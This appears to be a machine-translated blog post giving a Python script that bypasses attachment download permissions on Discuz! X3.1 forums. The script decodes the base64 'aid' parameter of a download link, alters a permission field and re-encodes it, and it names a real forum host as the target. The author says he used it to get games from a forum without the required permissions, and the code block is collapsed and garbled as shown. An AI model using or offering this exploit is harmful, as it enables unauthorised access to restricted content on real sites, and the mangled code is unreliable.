Python Implementation discuz Forum attachment download Permission Bypass vulnerability

Background: The recent pressure is some big, want to play some games to relax, go to the Mac forum download, found that need various permissions, so the egg hurts.

So, I checked the discuz! on the Internet. x3.1 hack, manual replacement, found that "link expired" appears. So write the following procedure.

0. Copy the following code into your Python IDE.

1. Advanced Web page, Chrome browser View page elements, replace the content within the regular expression.

2. Refresh the page you want to download, right-click the copy download link URL = ' You copied the link '

3. Run python and your IDE will print out the truth.

Operating Environment: python3.5

Operating system: MacPro 2016

ImportBase64ImportRe#here is your mouse right click-"Save the link to download." Replace URL = ' You copy down the link '#where "The first part" is '. Forum.php?mod=attachment&aid= ' "The second part" is forum.php?mod=attachment&aid=#It's going to be used laterURL ='FORUM.PHP?MOD=ATTACHMENT&AID=NJE4NZF8NMM2ZDU4Y2Z8MTQ5ODGZNJUYMNWWFDIYMTG3'#Url0 is the homepage of the URL you want to download, plus "Part Two" is "forum.php?mod=attachment&aid="Url0 ='http://m.tracker.7do.net/forum.php?mod=attachment&aid='#Regular expressions, you need to replace the "first part", or "forum.php\?mod=attachment&aid=", in parentheses with the first part of your copy link.P = r'(forum.php\?mod=attachment&aid=) (. +)'Aid= Re.search (P, URL). Group (2) Z=Base64.b64decode (AID)#The following regular is not a tube#print (z)P = r"( B ') (. +) (')"Z1= Re.search (P, str (z)). Group (2)#print (z1)P = r"(. +) (\|0\|) (.+)"Z2= Re.search (P,str (Z1)). Group (1) P= R"(. +) (\|0\|) (.+)"Z3= Re.search (P,str (Z1)). Group (3)#print (z2)K = z2 +'|2|'+z3k= Bytes (k, encoding ="UTF8")#print (k)#k = B ' 61871|acf3aa27|1498835323|1|22187 'j =Base64.b64encode (k)#print (j)P = r"( B ') (. +) (')"J1= Re.search (P, str (j)). Group (2)#print (J1)URL1= Url0 +J1Print(URL1)

Remark: The above hack is only for learning use, do not use in other uses, if infringement, please contact the author, that is me, I will handle properly.

Do not understand the process, you can see the following reference.

Resources:

1. The conversion between Python str and bytes

Regular Expressions in 2.python (re-modules)

3.Discuz Forum Attachment Download Permission Bypass vulnerability

Python Implementation discuz Forum attachment download Permission Bypass vulnerability